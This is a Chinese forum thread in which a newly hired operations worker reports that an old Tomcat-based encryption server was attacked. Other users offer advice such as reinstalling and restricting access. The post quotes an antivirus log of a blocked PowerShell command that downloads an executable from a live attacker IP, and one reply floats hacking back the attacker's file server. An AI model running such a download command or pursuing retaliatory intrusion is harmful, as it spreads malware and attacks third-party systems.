入职新公司运维岗，结果服务器被搞了-嘟嘟社区

本帖最后由 coolday 于 2022-10-17 16:05 编辑

有一台公司的旧的加密软件的服务端服务器（不是我部署的，是离职前的运维部署的。）
今天上去一看，被搞了，还好被杀软拦了下来

防护项目：Web服务器
操作目标：【执行】 C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
操作目标参数：powershell (new-object System.Net.WebClient).DownloadFile(‘http://23.224.232.147:7777/TF/svcyr.exe’,’window.exe’)
操作结果：已阻止

保护进程路径：C:Program Files (x86)ESAFENETCDocGuard Servertomcat64bintomcat8.exe
保护进程命令行："C:Program Files (x86)ESAFENETCDocGuard Servertomcat64bintomcat8.exe" //RS//CobraDG

这怎么办。。？

重装保平安

好家伙 cera的IP 入职新公司运维岗，结果服务器被搞了

skywing 发表于 2022-10-17 16:04
重装保平安

刚入职几天，还不了解情况
不敢乱动服务器。

报告老板,

自来光发表于 2022-10-17 16:05
好家伙 cera的IP

这家伙用的cera的IP 搭建的HFS文件服务器
我记得HFS好像是有漏洞来着？
可以反搞他不？

给tomcat降权、

只是负责加解密的先限制下出入的IP呢

看见23开头的ip 就很眼熟

forgeter 发表于 2022-10-17 16:11
看见23开头的ip 就很眼熟

cera的IP啊，也是为了抓鸡挖矿煞费苦心。